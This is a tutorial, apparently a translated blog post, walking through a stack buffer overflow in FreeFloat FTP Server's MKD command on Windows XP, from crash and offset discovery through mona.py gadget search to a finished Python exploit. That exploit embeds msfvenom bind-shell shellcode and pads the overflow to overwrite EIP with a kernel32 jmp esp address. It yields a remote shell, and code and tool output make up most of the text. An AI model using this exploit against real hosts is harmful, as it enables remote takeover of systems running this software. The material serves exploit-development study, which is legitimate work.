Windows Application Exploit -> Saved Return Pointer Overflows

This post was written by analyzing and loosely translating fuzzysecurity Tutorials part 15 -> Saved Return Pointer Overflows. Its purpose is to study vulnerabilities that exist in Windows applications.

Analysis environment

  • Windows XP PRO SP3
  • Software: FreeFloat FTP
  • Python
  • Kali linux

 

Step 1. Application

When you run the program, it lets you set a port number and has Start and Stop buttons.

Checking with netstat shows that port 21 is open. It is a simple server program.

# Python 2: plain FTP client session against the test server
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.236.128', 21))

print s.recv(1024)          # server banner

s.send('USER anonymous\r\n')
print s.recv(1024)

s.send('PASS anonymous\r\n')
print s.recv(1024)

s.send('PWD\r\n')
print s.recv(1024)

s.send('LIST\r\n')
print s.recv(1024)

s.send('QUIT\r\n')
s.close()                   # close() must be called, not just referenced

I wrote Python code that connects to port 21 with a socket. The commands sent by the code are FTP server commands.

Once connected, it sends credentials with the USER and PASS commands and then tries running several other commands.

 

Step 2. Application vulnerability

The vulnerability is in the 'MKD string': the directory name supplied when creating a directory is placed on the stack, and because that directory name is not length-checked, it can overwrite the return address.

# Python 2: crash trigger, 0x300 bytes of 'A' as the MKD directory name
import socket

evil = "A" * 0x300

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.236.128', 21))

print s.recv(1024)

s.send('USER anonymous\r\n')
print s.recv(1024)

s.send('PASS anonymous\r\n')
print s.recv(1024)

s.send('PWD\r\n')
print s.recv(1024)

s.send('MKD ' + evil + '\r\n')   # overlong directory name overwrites the saved return address
print s.recv(1024)

s.send('QUIT\r\n')
s.close()

This exploit code sends 0x300 'A's as the directory name.

Looking at the result, the Offset field in the error information shows 0x41414141. This is because the many 'A's overwrote the return address slot with "AAAA".

Checking precisely in a debugger, EIP has been overwritten with 0x41414141. Now that we know it gets overwritten, we need the offset to the return address.

I generated a pattern using Kali linux.

Putting the generated pattern into the exploit code and running it, EIP shows 0x69413269, and checking the offset shows that it is 247 bytes.
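To make the 247-byte result reproducible offline, here is an added example (not code from the original post or from the fuzzysecurity tutorial) that re-implements the cyclic "Aa0Aa1..." pattern logic of the Metasploit pattern_create / pattern_offset tools in Python 3 and looks up the crash value 0x69413269 in it.

```python
# Added example: minimal pattern_create / pattern_offset reimplementation.
# The Metasploit pattern is a sequence of 3-byte triples (UPPER, lower, digit);
# every 4-byte window is unique within the first 26*26*10*3 = 20280 bytes, so the
# 4 bytes that land in EIP identify the exact offset into the sent buffer.
import string
import struct

PATTERN_MAX = 26 * 26 * 10 * 3   # length after which triples would repeat


def pattern_create(length):
    """Return the first `length` bytes of the cyclic Aa0Aa1...Zz9 pattern."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_value, length=PATTERN_MAX):
    """Return the offset of the bytes that ended up in EIP, or -1 if not found.

    eip_value is the crash value as an integer (e.g. 0x69413269). It is packed
    little-endian because that is the order the 4 bytes had in memory, so
    0x69413269 becomes the substring "i2Ai".
    """
    needle = struct.pack("<L", eip_value).decode("ascii", "replace")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # EIP = 0x69413269 from Step 2 resolves to offset 247; the plain "AAAA"
    # crash value from the first run is not in the pattern at all.
    print(pattern_offset(0x69413269))   # 247
    print(pattern_offset(0x41414141))   # -1
```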

 

Step 3. Exploit

We know the offset, but we still need to decide what address to overwrite the return address with. Even if we place shellcode in the buffer, we do not know its address, so we need another approach. We will use a jmp esp gadget.

We need to find a jmp esp gadget using the mona.py plugin.

Module info :
----------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
0x7c800000 | 0x7c930000 | 0x00130000 | False | True | False | False | True | 5.1.2600.5512 [kernel32.dll] (C:\WINDOWS\system32\kernel32.dll)
0x77bc0000 | 0x77c18000 | 0x00058000 | False | True | False | False | True | 7.0.2600.5512 [msvcrt.dll] (C:\WINDOWS\system32\msvcrt.dll)
0x7c930000 | 0x7c9cb000 | 0x0009b000 | False | True | False | False | True | 5.1.2600.5512 [ntdll.dll] (C:\WINDOWS\system32\ntdll.dll)
0x719c0000 | 0x719c8000 | 0x00008000 | False | True | False | False | True | 5.1.2600.5512 [wshtcpip.dll] (C:\WINDOWS\System32\wshtcpip.dll)
0x73f80000 | 0x73feb000 | 0x0006b000 | False | True | False | False | True | 1.0420.2600.5512 [USP10.dll] (C:\WINDOWS\system32\USP10.dll)
0x77ef0000 | 0x77f01000 | 0x00011000 | False | True | False | False | True | 5.1.2600.5512 [Secur32.dll] (C:\WINDOWS\system32\Secur32.dll)
0x719d0000 | 0x719d8000 | 0x00008000 | False | True | False | False | True | 5.1.2600.5512 [WS2HELP.dll] (C:\WINDOWS\system32\WS2HELP.dll)
0x76970000 | 0x76aad000 | 0x0013d000 | False | True | False | False | True | 5.1.2600.5512 [ole32.dll] (C:\WINDOWS\system32\ole32.dll)
0x77e70000 | 0x77ee6000 | 0x00076000 | False | True | False | False | True | 6.00.2900.5512 [SHLWAPI.dll] (C:\WINDOWS\system32\SHLWAPI.dll)
0x65cb0000 | 0x65d06000 | 0x00056000 | False | True | False | False | True | 5.1.2600.5512 [hnetcfg.dll] (C:\WINDOWS\system32\hnetcfg.dll)
0x77cf0000 | 0x77d80000 | 0x00090000 | False | True | False | False | True | 5.1.2600.5512 [USER32.dll] (C:\WINDOWS\system32\USER32.dll)
0x62340000 | 0x62349000 | 0x00009000 | False | True | False | False | True | 5.1.2600.5512 [LPK.DLL] (C:\WINDOWS\system32\LPK.DLL)
0x00400000 | 0x0040f000 | 0x0000f000 | False | False | False | False | False | -1.0- [FTPServer.exe] (C:\Documents and Settings\Administrator\바탕 화면\fuzzysecurity\687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver\Win32\FTPServer.exe)
0x5a480000 | 0x5a4b8000 | 0x00038000 | False | True | False | False | True | 6.00.2900.5512 [uxtheme.dll] (C:\WINDOWS\system32\uxtheme.dll)
0x7d5a0000 | 0x7dd9d000 | 0x007fd000 | False | True | False | False | True | 6.00.2900.5512 [SHELL32.dll] (C:\WINDOWS\system32\SHELL32.dll)
0x77d80000 | 0x77e12000 | 0x00092000 | False | True | False | False | True | 5.1.2600.5512 [RPCRT4.dll] (C:\WINDOWS\system32\RPCRT4.dll)
0x4b540000 | 0x4b55a000 | 0x0001a000 | False | True | False | False | True | 6.1.2600.3 [imekr61.ime] (C:\WINDOWS\system32\imekr61.ime)
0x77160000 | 0x77263000 | 0x00103000 | False | True | False | False | True | 6.0 [comctl32.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x762e0000 | 0x762fd000 | 0x0001d000 | False | True | False | False | True | 5.1.2600.5512 [IMM32.DLL] (C:\WINDOWS\system32\IMM32.DLL)
0x75110000 | 0x7513e000 | 0x0002e000 | False | True | False | False | True | 5.1.2600.5512 [msctfime.ime] (C:\WINDOWS\system32\msctfime.ime)
0x74660000 | 0x746ac000 | 0x0004c000 | False | True | False | False | True | 5.1.2600.5512 [MSCTF.dll] (C:\WINDOWS\system32\MSCTF.dll)
0x71980000 | 0x719bf000 | 0x0003f000 | False | True | False | False | True | 5.1.2600.5512 [mswsock.dll] (C:\WINDOWS\system32\mswsock.dll)
0x77e20000 | 0x77e69000 | 0x00049000 | False | True | False | False | True | 5.1.2600.5512 [GDI32.dll] (C:\WINDOWS\system32\GDI32.dll)
0x77f50000 | 0x77ff8000 | 0x000a8000 | False | True | False | False | True | 5.1.2600.5512 [ADVAPI32.dll] (C:\WINDOWS\system32\ADVAPI32.dll)
0x719e0000 | 0x719f7000 | 0x00017000 | False | True | False | False | True | 5.1.2600.5512 [WS2_32.dll] (C:\WINDOWS\system32\WS2_32.dll)
----------------------------------------------------------------------------------------------------------------------------------
0x7c86467b : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x719c1c8b : jmp esp | {PAGE_EXECUTE_READ} [wshtcpip.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\System32\wshtcpip.dll)
0x769e9bff : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769ea930 : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a3996b : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a5068d : jmp esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x77ebb227 : jmp esp | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x65ceb24f : jmp esp | {PAGE_EXECUTE_READ} [hnetcfg.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\hnetcfg.dll)
0x77d09353 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d256f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d35af7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x77d3b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
0x7d5b30d7 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b30eb : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b30ff : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b313b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b314f : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3163 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b318b : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b319f : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31b3 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31c7 : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31db : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b31ef : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3203 : jmp esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d5b3217 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d71fa1e : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d728eed : jmp esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x77d9560a : jmp esp | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x77da025b : jmp esp | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x771836f8 : jmp esp | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x74691873 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
0x77e41d2f : jmp esp | {PAGE_EXECUTE_READ} [GDI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\GDI32.dll)
0x77f6f049 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f7965b : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f98063 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77fa3b63 : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77fc2a9f : jmp esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x7c8369f0 : call esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x7c868667 : call esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
0x7c944663 : call esp | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x7c98311b : call esp | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x76996cca : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769d9622 : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769fe37b : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a1120b : call esp | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x7d5b30e3 : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d647ed3 : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d68f81b : call esp | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d6b0672 : call esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7d72183c : call esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x7469d20f : call esp | {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSCTF.dll)
0x719a8d3f : call esp | {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
0x77f6effc : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f6f0b2 : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f98153 : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x77f9c23b : call esp | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x719ef8fb : call esp | {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)
0x77c01025 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5512 (C:\WINDOWS\system32\msvcrt.dll)
0x7c949db0 : push esp # ret | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
0x76981594 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76983624 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x769c0b4e : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a6dd4e : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x76a93995 : push esp # ret | {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ole32.dll)
0x77e7c62b : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e7c77f : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e84ba3 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e91d86 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77e91e8c : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x77ebd3a8 : push esp # ret | {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
0x5a496aeb : push esp # ret | {PAGE_EXECUTE_READ} [uxtheme.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\uxtheme.dll)
0x7d5c56ad : push esp # ret | {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
0x77dc6955 : push esp # ret | {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\RPCRT4.dll)
0x77163be9 : push esp # ret | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x7718c390 : push esp # ret | {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
0x7511e436 : push esp # ret | {PAGE_EXECUTE_READ} [msctfime.ime] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\msctfime.ime)
0x719951a5 : push esp # ret | {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\mswsock.dll)
0x77f51758 : push esp # ret | {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ADVAPI32.dll)
0x719e2b53 : push esp # ret | {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WS2_32.dll)

Running the !mona jmp -r esp command in mona.py lists the gadgets in the log window as shown above. Let's use the gadget at 0x7c86467b. It is a gadget in kernel32.dll; the address is flagged SafeSEH and OS dll, but since this is XP we do not need to worry about that.

Looking at where esp points at the moment of the jmp esp, it points at the address of the "nd not understood" string.

If we force execution to continue, the string data is interpreted as assembly and strange code gets executed.

So if we place a NOP sled and shellcode at that address, it will execute.

root@kali:~# msfvenom -p windows/shell_bind_tcp LPORT=8888 -b '\x0D\x0A\x00' -f c
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes

I generated a bind shellcode with Kali linux and added it to the code. Then run the application and run the code.

#!/usr/bin/python
# Python 2: final exploit, padding + jmp esp gadget + NOP sled + shellcode

import socket
import struct

# bind shell generated with msfvenom (windows/shell_bind_tcp, LPORT=8888,
# bad chars \x0D\x0A\x00 excluded)
buf = ""
buf += "\xb8\x9f\xad\x1b\x95\xda\xd2\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x53\x31\x45\x12\x83\xc5\x04\x03\xda\xa3\xf9"
buf += "\x60\x18\x53\x7f\x8a\xe0\xa4\xe0\x02\x05\x95\x20\x70"
buf += "\x4e\x86\x90\xf2\x02\x2b\x5a\x56\xb6\xb8\x2e\x7f\xb9"
buf += "\x09\x84\x59\xf4\x8a\xb5\x9a\x97\x08\xc4\xce\x77\x30"
buf += "\x07\x03\x76\x75\x7a\xee\x2a\x2e\xf0\x5d\xda\x5b\x4c"
buf += "\x5e\x51\x17\x40\xe6\x86\xe0\x63\xc7\x19\x7a\x3a\xc7"
buf += "\x98\xaf\x36\x4e\x82\xac\x73\x18\x39\x06\x0f\x9b\xeb"
buf += "\x56\xf0\x30\xd2\x56\x03\x48\x13\x50\xfc\x3f\x6d\xa2"
buf += "\x81\x47\xaa\xd8\x5d\xcd\x28\x7a\x15\x75\x94\x7a\xfa"
buf += "\xe0\x5f\x70\xb7\x67\x07\x95\x46\xab\x3c\xa1\xc3\x4a"
buf += "\x92\x23\x97\x68\x36\x6f\x43\x10\x6f\xd5\x22\x2d\x6f"
buf += "\xb6\x9b\x8b\xe4\x5b\xcf\xa1\xa7\x33\x3c\x88\x57\xc4"
buf += "\x2a\x9b\x24\xf6\xf5\x37\xa2\xba\x7e\x9e\x35\xbc\x54"
buf += "\x66\xa9\x43\x57\x97\xe0\x87\x03\xc7\x9a\x2e\x2c\x8c"
buf += "\x5a\xce\xf9\x39\x52\x69\x52\x5c\x9f\xc9\x02\xe0\x0f"
buf += "\xa2\x48\xef\x70\xd2\x72\x25\x19\x7b\x8f\xc6\x07\xc4"
buf += "\x06\x20\x2d\x24\x4f\xfa\xd9\x86\xb4\x33\x7e\xf8\x9e"
buf += "\x6b\xe8\xb1\xc8\xac\x17\x42\xdf\x9a\x8f\xc9\x0c\x1f"
buf += "\xae\xcd\x18\x37\xa7\x5a\xd6\xd6\x8a\xfb\xe7\xf2\x7c"
buf += "\x9f\x7a\x99\x7c\xd6\x66\x36\x2b\xbf\x59\x4f\xb9\x2d"
buf += "\xc3\xf9\xdf\xaf\x95\xc2\x5b\x74\x66\xcc\x62\xf9\xd2"
buf += "\xea\x74\xc7\xdb\xb6\x20\x97\x8d\x60\x9e\x51\x64\xc3"
buf += "\x48\x08\xdb\x8d\x1c\xcd\x17\x0e\x5a\xd2\x7d\xf8\x82"
buf += "\x63\x28\xbd\xbd\x4c\xbc\x49\xc6\xb0\x5c\xb5\x1d\x71"
buf += "\x6c\xfc\x3f\xd0\xe5\x59\xaa\x60\x68\x5a\x01\xa6\x95"
buf += "\xd9\xa3\x57\x62\xc1\xc6\x52\x2e\x45\x3b\x2f\x3f\x20"
buf += "\x3b\x9c\x40\x61"

DUMMY = "A" * 247                     # padding up to the saved return address (offset from Step 2)
JMP = struct.pack('<L', 0x7c86467b)   # jmp esp gadget in kernel32.dll, packed little-endian
NOP = "\x90" * 100                    # NOP sled that esp lands in after the jmp
#SHELLCODE = "C"*100                  # placeholder used while testing the layout

evil = DUMMY + JMP + NOP + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.236.183', 21))

print s.recv(1024)
s.send('USER anonymous\r\n')
print s.recv(1024)
s.send('PASS anonymous\r\n')
print s.recv(1024)
s.send('MKD ' + evil + '\r\n')        # overflowing directory name
print s.recv(1024)
s.send('QUIT\r\n')
s.close()

Using nc locally, I obtained a shell on the Windows XP machine.
